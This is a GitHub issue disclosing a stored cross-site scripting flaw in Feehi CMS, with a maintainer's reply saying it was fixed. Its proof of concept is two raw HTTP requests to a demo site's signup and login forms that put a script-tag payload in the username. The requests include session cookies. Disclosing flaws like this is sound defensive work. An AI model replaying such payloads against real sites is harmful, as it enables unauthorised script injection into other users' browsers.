Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
This is a Cross Site Scripting vulnerability. When the user name is <script>alert(1)<script> or js code, the pop-up alert will be triggered when browsing the post. Details are as follows:
POC example:
registered:
POST /index.php?r=site%2Fsignup HTTP/1.1 Host: demo.cms.feehi.com Content-Length: 283 Cache-Control: max-age=0 Origin: http://demo.cms.feehi.com Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Referer: http://demo.cms.feehi.com/index.php?r=site%2Fsignup Accept-Encoding: gzip, deflate Accept-Language: zh-HK,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,zh-TW;q=0.6 Cookie: Hm_lvt_5c8dd664b2122c4e33710bc08309c5e9=1572536291; Hm_lvt_949aa9449254cd665295a150d530d9c1=1572536091,1572583297; Hm_lpvt_949aa9449254cd665295a150d530d9c1=1572583297; _csrf_backend=587536836a78f5b1b93c7e038d97a0a6af03f097ff9cc90b328fe261e1541b74a%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22B3bX5mvAJKkAKwrO2ZxHinLa343w9ogL%22%3B%7D; Hm_lvt_faacd6412dc0ae220c883834f9c896eb=1572536077,1572582746,1572600883,1572600906; BACKEND_FEEHICMS=km3devogu3n3qvlsenfne27eec; _csrf=b19e3b1d941ce5196dd37924e05ac94fe2ace87f75a732fe96ce4d102789e664a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%221hgfXZdTQZmZKNxHE4MuEXGWHd2_uDtF%22%3B%7D; PHPSESSID=u69rgiksidqnl78r4n9g45frfn; Hm_lpvt_faacd6412dc0ae220c883834f9c896eb=1572601317 Connection: close _csrf=gTY-NUvHDzoCLFGO7L9d7f4Mtqn3QkRnFFv0yq8jpF6wXllTE51rblN2PNSn8SWluzj73LIaAzBcP8aV2mfQGA%3D%3D&SignupForm%5Busername%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&SignupForm%5Bemail%5D=12345678%40qq.com&SignupForm%5Bpassword%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&signup-button=
login:
POST /index.php?r=site%2Flogin HTTP/1.1 Host: demo.cms.feehi.com Content-Length: 296 Cache-Control: max-age=0 Origin: http://demo.cms.feehi.com Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Referer: http://demo.cms.feehi.com/index.php?r=site%2Flogin Accept-Encoding: gzip, deflate Accept-Language: zh-HK,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,zh-TW;q=0.6 Cookie: Hm_lvt_5c8dd664b2122c4e33710bc08309c5e9=1572536291; Hm_lvt_949aa9449254cd665295a150d530d9c1=1572536091,1572583297; Hm_lpvt_949aa9449254cd665295a150d530d9c1=1572583297; _csrf_backend=587536836a78f5b1b93c7e038d97a0a6af03f097ff9cc90b328fe261e1541b74a%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22B3bX5mvAJKkAKwrO2ZxHinLa343w9ogL%22%3B%7D; Hm_lvt_faacd6412dc0ae220c883834f9c896eb=1572536077,1572582746,1572600883,1572600906; BACKEND_FEEHICMS=km3devogu3n3qvlsenfne27eec; _csrf=b19e3b1d941ce5196dd37924e05ac94fe2ace87f75a732fe96ce4d102789e664a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%221hgfXZdTQZmZKNxHE4MuEXGWHd2_uDtF%22%3B%7D; PHPSESSID=u69rgiksidqnl78r4n9g45frfn; Hm_lpvt_faacd6412dc0ae220c883834f9c896eb=1572601432 Connection: close _csrf=DNiLSKN3vY4TpWeADWU7igas1i5rCbMJ-ewQrKYUQJg9sOwu-y3Z2kL_CtpGK0PCQ5ibWy5R9F6xiCLz01A03g%3D%3D&LoginForm%5Busername%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&LoginForm%5Bpassword%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&LoginForm%5BrememberMe%5D=0&LoginForm%5BrememberMe%5D=1&login-button=
login:
View post:
How to fix: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
The text was updated successfully, but these errors were encountered:
fix username xss vulnerability tnx
Sorry, something went wrong.
No branches or pull requests
This is a Cross Site Scripting vulnerability. When the user name is <script>alert(1)<script> or js code, the pop-up alert will be triggered when browsing the post. Details are as follows:
POC example:
registered:
login:
registered:

login:

View post:


How to fix: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
The text was updated successfully, but these errors were encountered: